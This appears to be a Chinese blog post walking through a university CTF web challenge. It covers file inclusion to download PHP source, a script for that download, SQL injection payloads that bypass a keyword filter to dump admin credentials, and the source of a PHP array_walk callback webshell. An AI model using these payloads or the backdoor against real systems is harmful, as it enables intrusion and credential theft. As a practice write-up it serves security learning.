南邮CTF综合题2

最新推荐文章于 2024-08-22 20:44:44 发布
最新推荐文章于 2024-08-22 20:44:44 发布
阅读量3.2k 收藏 5
点赞数 3
分类专栏: 南邮CTF 文章标签: 南邮CTF 综合题2 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mylyylmy/article/details/79885143
版权
本文详细记录了解决南邮CTF一道综合题的过程,主要涉及SQL注入。通过分析输入框、 CMS提示、文件包含漏洞,逐步揭示了密码解码和后台登录的过程,最终找到并获取了flag。
摘要由CSDN通过智能技术生成

南邮CTF综合题2----小白的第一篇

在自己加别人的WP的帮助下终于完成了这道十分有价值的CTF题目

首先我们看到题目的主体界面

其他的都没有意义,我们首先看到的是输入框,很自然的就想到XSS或者SQL,但是发表留言之后弹出非XSS的弹框,这就意味着这道题很大可能是SQL注入

我们先看留言搜索输入1后

这需要修改USER-AGENT但是我们并不知道这个可以通过验证的USER-AGENT是什么,所以往下看

看到一个CMS说明

很明显的提醒了,我们应该先从这里入手

看文章内容,他给了两个提示

一个是文件:config.php,index.php,passencode.php,say.php

另一个是admin的表结构,这里更加确信是SQL注入了

注意到这里的URL是应该是存在文件包含的(不然给我们文件名称干什么),我们试一下

file=index.php

果然,文件的内容被都取出来了

我们先把他下载下来,这里我写了一个脚本

import requests
import codecs
from bs4 import BeautifulSoup

url="http://cms.nuptzj.cn/about.php?file="
file_list = ["index.php","passencode.php","say.php","config.php","antixss.php","about.php","so.php","antiinject.php","xlcteam.php"]

for i in file_list:
    res = requests.get(url+i)
    print("dowload "+i)
    if res.status_code==200:
        res.encoding="utf8"
    with codecs.open(i,"w+","utf8") as handle:
        print("done")
        text = BeautifulSoup(res.text,"lxml").text
        handle.write(text)

当然里面的文件有些是后来发现的,我就先放在这里

先看index.php发现其包含了antixss.php应该是预防XSS攻击的,passencode.php是将用户输入的密码存储为ASCII码的形式 say.php是处理用户留言的,这时就陷入了苦恼

突然发现,我们忘记了一个文件------读取文件的about.php,下载下来之后发现存在敏感目录loginxlcteam,看名字好像是登陆的

在URL中访问,既然是目录就应该有index.php吧,先试一试

成功进入后台登陆界面,但是。。。。各种用户名不存在。

查看源码存在数据库操作的php文件还有so.php,这个就是当时搜索的php,先下载下来

惊奇的发现里面包含了antiinject.php这个应该就是防止SQL注入的文件了,下载下载

<?php
function antiinject($content){
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");
$info=strtolower($content);
for($i=0;$i<=count($keyword);$i++){
 $info=str_replace($keyword[$i], '',$info);
}
return $info;
}
?>

文件过滤了敏感的单词,但是双重绕过就好了

丧心病狂的过滤了空格,可以用/**/来绕过

先看一下搜索的源码

$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");

这里的$id没有用''包裹,所以直接注入就好

先看一下回显

soid=-1/**/UNunionION/**/SELselectECT/**/1,2,3,4

发现共四个参数,显示的是2,3

因为之前已经了解到了表的结构,所以直接注入

soid=-1/**/UNunionION/**/SELselectECT/**/1,usernam=e,userpas=s,4/**/fro=m/**/admi=n

得到admin的password

102 117 99 107 114 117 110 116 117

之前说过password是ASCII码存储的,所以解码得到admin的密码

fuckruntu

登陆

emmmm一句话木马,我们先把源码下载下来

<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>

三个参数的数组回调后门

先看一下目录下面有什么文件

虽然乱码,但我们还是看到了最后那个flag

看看前面的是什么

直接在文件包含那里面查看

成功拿到flag

 

 

 

 

mylyylmy
关注
专栏目录
南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 603
终于开始学pwn了…今天第一次做出来这题,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
mysql 南邮ctf_南邮CTF平台WEB题writeup
weixin_39596739的博客
02-07 2619
https://cgctf.nuptsast.com/login1.签到题F12查看网页源代码就有flag2.md5 collision附上题目给的源代码md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo ...
南邮CTF综合题2脚本
07-11
南京邮电大学网络攻防平台综合题2脚本,可以直接跑出所需的数据。
南邮NCTF综合题2
克格莫(有需要的私信)
12-19 260
构造查询管理员密码的payload: POST /so.php HTTP/1.1 Host: cms.nuptzj.cn Proxy-Connection: keep-alive Content-Length: 151 Cache-Control: max-age=0 Origin: http://cms.nuptzj.cn Upgrade-Insecure-Requests: 1 Conte...
PHP一句话木马免杀方式汇总
最新发布
qq_48368964的博客
08-22 902
create_function函数把用户传递的数据生成一个函数fun(),然后再执行fun()php$fun();?
CTF-综合测试(高难度)【超详细】
不知名白帽的博客
09-09 1万+
CTF-综合测试(高难度)【超详细】
南京邮电大学CTF-密码学-mixed_base64
白浪的博客
05-01 1145
题目如下:1.先把code.txt保存为一个文件2.加密过程:    十次加密,每一次在base16,32,64中随机选择一种加密3.解密过程:    用python直接尝试爆破解密代码:#*****题目:多重base64加密 #*****python破解代码 import base64 def decode_mix_base64(b): a = b # print a ...
南邮CTF练习题——web题
dcison的博客
11-11 4万+
南邮CTF部分题解
南邮攻防平台综合题2脚本
07-11
南京邮电大学网络攻防平台综合题2脚本,可以直接跑出所需的数据。
南邮CTF-WEB-write-up 教程详细解说
残阳泼茶香的博客
03-20 3497
单身一百年也没用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 密码重置 php 反序列化 sql injection 4 综合题 system SQL注入2 综合题2 注入实战1 密码重置2 ...
南京邮电大学2021年CTF
戴夫特
03-15 1036
web登入页面1 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($_POST[user]); $pass = md5(trim($_POST[pass])); $sql
“安恒杯”南京邮电大学首届CTF网络攻防比赛实施方案.pdf
09-09
“安恒杯”南京邮电大学首届CTF网络攻防比赛实施方案
CTF-入门练习题
10-30
题目来自于蓝盾服务器,难度适中,适合于练习,需要wp请留言
CG CTF-Web-综合题2
feng的博客
09-08 796
前言 这道题主要涉及了文件包含、代码审计、SQL注入、回调后门等内容。 这道题是CG CTF里面出的比较好的一个题目了,对于我这样的萌新来说,虽然不能独立做出来,但是看了WP之后真的学到了很多东西,也知道了自己欠缺的在哪里。 WP 打开环境,看到是Xlcteam客户留言板。我们先随便看看。留言搜索框那里输入后是这样: 有经验的师傅其实已经猜到可能是对HTTP请求头里面的某些内容进行比较,这里应该可以伪造http请求头来绕过。 留言那里随便输点东西,看到XSS应该不行。 这里说查看网页源码有惊喜,但是我
南京邮电大学CTF题目writeup (二) 含题目地址
cainsoftware的博客
09-30 643
Pass-01 题目地址:http://nctf.nuptzj.cn/web15/ 看题目就是一个登录失败的提示"Invalid password!" 通过查看源代码 可见如下图: #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str)
南京邮电大学CTF题目writeup (一) 含题目地址
cainsoftware的博客
09-30 1045
题目地址:http://nctf.nuptzj.cn/ Pass-01 进去就说我不是admin 所以肯定是破解admin的账户密码拿到flag 点击下面的源码 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //连接数据库 mysql_select_db(S
南邮 ctf
天跃
08-03 474
1. 这道题把我做的真的是头上有些凉凉,整了半天才搞出来,内心是相当的崩溃2333333 进到页面一看是个登录的,那我就傻傻的等一下,嗯,是的没有反应,发现下面有个 点进去看看,发现是代码。 &lt;?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?&gt; &lt;?php ...
NCTF 南京邮电大学网络攻防训练平台 WriteUp
热门推荐
4ct10n
08-02 8万+
NCTF 南京邮电大学网络攻防训练平台 WriteUp不说什么直接上题解WEB1.签到题(50)直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa}2.md5 collision(50)源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ i
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值